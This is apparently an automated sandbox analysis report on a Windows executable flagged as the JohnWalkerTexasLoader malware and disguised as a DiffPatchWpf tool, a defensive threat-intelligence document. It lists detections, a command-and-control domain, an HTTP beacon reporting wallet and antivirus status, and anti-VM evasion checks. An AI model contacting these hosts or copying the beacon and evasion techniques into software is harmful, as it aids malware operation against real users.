Edit tour

Windows Analysis Report
R5AREmpD4S.exe

Overview

General Information

Sample name:	R5AREmpD4S.exe renamed because original name is a hash value
Original sample name:	b395637671eff620f784d4a8652425951fb3e834.exe
Analysis ID:	1542939
MD5:	851943a365537291c75d267db294961a
SHA1:	b395637671eff620f784d4a8652425951fb3e834
SHA256:	e1dbec1fea6f0197ac5d3b33dbfd50ce7e2918c9930ed9e9bee16e2f576a2875
Tags:	dllexeJohnWalkerTexasLoaderJWTLJWTLoaderReversingLabsuser-NDA0E
Infos:

Detection

JohnWalkerTexasLoader

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected JohnWalkerTexasLoader

AI detected suspicious sample

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Detected potential crypto function

Enables debug privileges

HTTP GET or POST without a user agent

IP address seen in connection with other malware

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

R5AREmpD4S.exe (PID: 4952 cmdline: "C:\Users\user\Desktop\R5AREmpD4S.exe" MD5: 851943A365537291C75D267DB294961A)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
R5AREmpD4S.exe	JoeSecurity_JohnWalkerTexasLoader	Yara detected JohnWalkerTexasLoader	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.2050334085.000002517D962000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_JohnWalkerTexasLoader	Yara detected JohnWalkerTexasLoader	Joe Security
00000000.00000002.3306981925.0000025100001000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_JohnWalkerTexasLoader	Yara detected JohnWalkerTexasLoader	Joe Security
Process Memory Space: R5AREmpD4S.exe PID: 4952	JoeSecurity_JohnWalkerTexasLoader	Yara detected JohnWalkerTexasLoader	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.R5AREmpD4S.exe.2517d960000.0.unpack	JoeSecurity_JohnWalkerTexasLoader	Yara detected JohnWalkerTexasLoader	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: R5AREmpD4S.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: R5AREmpD4S.exe

ReversingLabs: Detection: 34%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 84.6% probability

Source: R5AREmpD4S.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Users\Administrator\Pictures\DiffPatchWpf-main\obj\x64\Release\DiffPatchWpf.pdb source: R5AREmpD4S.exe

Source: global traffic

HTTP traffic detected: GET /api.php?status=1&wallets=0&av=1 HTTP/1.1Host: xilloolli.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /api.php?status=1&wallets=0&av=1 HTTP/1.1Host: xilloolli.comConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: xilloolli.com

Source: R5AREmpD4S.exe, 00000000.00000002.3306981925.0000025100001000.00000004.00000800.00020000.00000000.sdmp, R5AREmpD4S.exe, 00000000.00000002.3306981925.0000025100487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: R5AREmpD4S.exe, 00000000.00000002.3306981925.0000025100001000.00000004.00000800.00020000.00000000.sdmp, R5AREmpD4S.exe, 00000000.00000002.3306981925.0000025100487000.00000004.00000800.00020000.00000000.sdmp, R5AREmpD4S.exe, 00000000.00000002.3306981925.0000025100499000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xilloolli.com
Source: R5AREmpD4S.exe, 00000000.00000002.3306981925.0000025100001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xilloolli.com/api-debug.php
Source: R5AREmpD4S.exe, 00000000.00000002.3306981925.0000025100001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xilloolli.com/api.php
Source: R5AREmpD4S.exe, 00000000.00000002.3306981925.0000025100458000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xilloolli.com/api.php?status=1&wa
Source: R5AREmpD4S.exe, 00000000.00000002.3306981925.0000025100001000.00000004.00000800.00020000.00000000.sdmp, R5AREmpD4S.exe, 00000000.00000002.3306981925.0000025100458000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xilloolli.com/api.php?status=1&wallets=0&av=1
Source: R5AREmpD4S.exe	String found in binary or memory: http://xilloolli.com/api.phpEhttp://xilloolli.com/api-debug.php
Source: R5AREmpD4S.exe	String found in binary or memory: https://github.com/reproteq/DiffPatchWpf3Copyright
Source: R5AREmpD4S.exe	String found in binary or memory: https://ipinfo.io/country
Source: R5AREmpD4S.exe	String found in binary or memory: https://ipinfo.io/ip
Source: R5AREmpD4S.exe	String found in binary or memory: https://oklibed.com

Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Code function: 0_2_00007FF848CF5DD6	0_2_00007FF848CF5DD6
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Code function: 0_2_00007FF848CF6B82	0_2_00007FF848CF6B82
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Code function: 0_2_00007FF848CF1180	0_2_00007FF848CF1180
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Code function: 0_2_00007FF848CF12D3	0_2_00007FF848CF12D3
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Code function: 0_2_00007FF848CF11FA	0_2_00007FF848CF11FA
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Code function: 0_2_00007FF848CFFF7C	0_2_00007FF848CFFF7C
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Code function: 0_2_00007FF848CF12FA	0_2_00007FF848CF12FA
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Code function: 0_2_00007FF848CF12F8	0_2_00007FF848CF12F8
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Code function: 0_2_00007FF848CFF869	0_2_00007FF848CFF869

Source: R5AREmpD4S.exe

Static PE information: No import functions for PE file found

Source: R5AREmpD4S.exe, 00000000.00000000.2050401941.000002517D984000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameDiffPatchWpf.exe2 vs R5AREmpD4S.exe
Source: R5AREmpD4S.exe	Binary or memory string: OriginalFilenameDiffPatchWpf.exe2 vs R5AREmpD4S.exe

Source: classification engine

Classification label: mal76.troj.evad.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\R5AREmpD4S.exe

Mutant created: NULL

Source: R5AREmpD4S.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: R5AREmpD4S.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Users\user\Desktop\R5AREmpD4S.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: R5AREmpD4S.exe

ReversingLabs: Detection: 34%

Source: R5AREmpD4S.exe

String found in binary or memory: EHH-ADD!IJJoEHH5JKK

Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: msvcp140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: msctfui.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Section loaded: d3dcompiler_47.dll	Jump to behavior

Source: C:\Users\user\Desktop\R5AREmpD4S.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\R5AREmpD4S.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: R5AREmpD4S.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: R5AREmpD4S.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: R5AREmpD4S.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: R5AREmpD4S.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: C:\Users\Administrator\Pictures\DiffPatchWpf-main\obj\x64\Release\DiffPatchWpf.pdb source: R5AREmpD4S.exe

Source: R5AREmpD4S.exe

Static PE information: 0x88FC0B2E [Wed Oct 29 18:15:10 2042 UTC]

Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Code function: 0_2_00007FF848BDD2A5 pushad ; iretd		0_2_00007FF848BDD2A6
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Code function: 0_2_00007FF848CF00BD pushad ; iretd		0_2_00007FF848CF00C1

Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Users\user\Desktop\R5AREmpD4S.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PhysicalMemory

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Users\user\Desktop\R5AREmpD4S.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PhysicalMemory

Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Memory allocated: 2517DCD0000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Memory allocated: 2517F600000 memory reserve \| memory write watch			Jump to behavior

Source: R5AREmpD4S.exe, 00000000.00000002.3308402349.0000025118031000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM
Source: R5AREmpD4S.exe, 00000000.00000002.3308402349.0000025118031000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_PhysicalMemoryPhysical Memory 0Win32_PhysicalMemoryPhysical MemoryPhysical MemoryPhysical MemoryRAM slot #0RAM slot #0VMware Virtual RAM00000001VMW-4096MB
Source: R5AREmpD4S.exe, 00000000.00000002.3309799986.000002511C424000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\R5AREmpD4S.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\R5AREmpD4S.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Queries volume information: C:\Users\user\Desktop\R5AREmpD4S.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation	Jump to behavior
